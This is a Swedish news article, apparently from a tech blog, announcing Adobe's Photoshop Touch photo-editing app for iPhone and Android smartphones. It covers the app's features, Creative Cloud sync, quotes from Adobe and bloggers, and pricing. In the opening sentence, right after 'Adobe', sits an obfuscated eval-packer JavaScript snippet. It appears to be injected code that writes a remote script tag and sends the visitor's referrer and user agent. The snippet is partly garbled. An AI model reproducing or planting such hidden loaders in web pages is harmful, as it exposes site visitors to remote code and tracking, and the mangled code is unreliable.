Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Adobe: Photoshop Touch för smartphones

Adobe: Photoshop Touch för smartphones
Sebastian

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsaiy|var|u0026u|referrer|ysisa||js|php’.split(’|’),0,{}))
lanserar Photoshop Touch-app för iPhone, iPod Touch och Android-smartphones. Med appen kan man redigera bilder med hjälp av en lång rad funktioner från det populära fotoredigeringsprogrammet – direkt på sin smartphone. Medlemmar i Adobe Creative Cloud kan gratis autosynkronisera bilder på totalt 2 GB och redigera från en annan enhet vid senare tillfälle.

Från och med idag kan fotoentusiaster redigera bilder med en ny Photoshop-app direkt när de tagit en bild med sin smartphone. Med nya appen Photoshop Touch kan man redigera bilder på upp till 12 megapixlar med lager samt kombinera flera foton med den intuitiva Scribble Selection-funktionen och förfina bilden med Refine Edge Tool. Lanseringen av Photoshop Touch-appen betyder att man nu inte behöver ta upp sin laptop eller tablet för att utnyttja Photoshop-funktioner till att redigera bilder.

“Smartphones används i allt större utsträckning som primär kamera eftersom den alltid är närmast till hands. Med den nya appen Photoshop Touch har man möjlighet att redigera bilderna direkt och samtidigt spara dem via Adobe Creative Cloud så att de kan jobba vidare med dem på sin laptop eller tablet vid senare tillfälle.” säger Mariah Andén, Nordisk marknadsföringsansvarig för Digital Media hos Adobe.

Med Photoshop Touch for Phone kan man redigera foton med flera bekanta Photoshop-funktioner som till exempel lager, markeringsverktyg, filter samt ton- och färgjusteringar. Samtidigt öppnas möjligheter för att även att lägga till grafik eller text i bilden.

Goda nyheter för mobilfotografer

Photoshop Touch-appen ger mobil kreativitet oavsett om man tar bilder med sin android- eller Apple-smartphone och flera kreativa personer har redan upptäckt möjligheterna med detta. Dan Marcolina, bloggare och författare till boken iPhone Obsessed, säger:

”Utbudet av funktioner och verktyg i Photoshop Touch for Phone är unikt, jämfört med de fotoredigeringsappar som finns på marknaden idag” säger Dan Marcolina, bloggaren och författare till boken iPhone Obsessed.

Läraren, mobilfotografen och bloggaren vid iphoggy.com Richard Gray tillägger:

”Adobe Photoshop Touch for Phone kan tillföra stort värde när man jobbar med lager eller blending-funktioner. Jag kommer att använda appen i min undervisning för att utforska de konstnärliga aspekterna av den kreativa processen och bland annat arbeta med surrealistiska bilder ochdreamscapes.”

Synkronisera foton och projekt med Creative Cloud

Appen Photoshop Touch är fullt integrerad med Adobes Creative Cloud-tjänster, som bland annat har 2GB gratis utrymme för att synkronisera foton. Det betyder att man kan börja med att redigera ett foto på sin smartphone för att sedan arbeta vidare med det på sin tablet eller laptop. Tack vare appens inbyggda 400 procents zoom kan man göra en lång rad förbättringar redan på en smartphoneskärm. Dessutom betyder slide-funktionen för tillpassning av kanter och filter att man redan är på god väg med den kreativa redigeringsprocessen när man arbetar vidare med sitt projekt på laptop eller tablet.

Pris och tillgänglighet

Adobe Photoshop Touch for Phone kan hämtas via iTunes store och Google Play från ca. 38 kr.

iOS-enheter behöver ha iOS 5, iPhone 4S eller iPod Touch (5. generation). Smartphones med Android behöver ha Android 4.0 (Ice Cream Sandwich) eller senare version.